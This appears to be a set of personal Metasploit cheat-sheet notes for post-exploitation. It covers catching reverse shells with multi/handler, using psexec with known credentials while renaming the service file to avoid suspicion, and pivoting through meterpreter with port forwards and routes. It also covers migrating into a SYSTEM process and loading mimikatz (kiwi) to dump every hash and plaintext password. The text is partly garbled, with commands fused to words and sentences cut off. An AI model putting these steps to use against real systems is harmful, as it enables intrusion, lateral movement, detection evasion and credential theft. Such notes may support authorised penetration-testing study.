Who cares if it's easy, that's the point right?
exploit/multi/handlerto catch reverse shells and manage several sessions. Make sure that you have the correct payload to catch.
exploit/windows/smb/psexecmodule with known credentials to create easy meterpreter sessions to pivot and exploit further. Can set the
SERVICE_FILENAMEoption to remove the random garbage used, because its suspicious (using something like
Payload with fancy shell, series of DLLs injected into a process memory and doesnt touch the disk, no separate process created. All comms over meterpreter are TLS encrypted unless specifically told not to.
# Below adds a port fwd, localhost:1234 -> meterpreter -> 10.0.0.1:22
meterpreter > portfwd add -l 1234 -p 22 -r 10.0.0.1
# Below adds a route to move all traffic for a subnet thru meterpreter session #1
msf > route add [subnet] [netmask] [session id]
msf > route add 10.0.1.0 255.255.255.0 1 # routes thru session 1 for 10.0.1.0/24
msf > route add 10.0.0.5 255.255.255.255 1 # routes thru session 1 for host 10.0.0.5
Sessions are managed with the
sessions -lcommand. Channels inside of sessions are managed with
channels -lcommand. Upgrade existing shells with the
sessions -u 1command.
CTRL-Zwill background a channel or session
Load additional modules using
use [module name]
We can load mimikatz directly into a running meterpreter session, giving us serious power. Need to be running as
SYSTEM, and we need to make sure the process we're in is the same architecture as the host.
Check if we're in matching arch types with
sysinfo. Check the
Meterpreterinfo to make sure they match. If we need to move, check which running processes have the correct arch and are running as
ps -A x64 -s, then we can move with
migrate [PID]. Validate the arch and meterpreter types match with
Now we can import the mimikatz module with
load kiwi. Running
helpwill show our new mimikatz commands we can use. Using
creds_allwill dump all available hashes and plaintext passwords!
Modular combination of scanners, exploits, payloads, and post modules.
Having issues importing a module? make sure that you check the logs at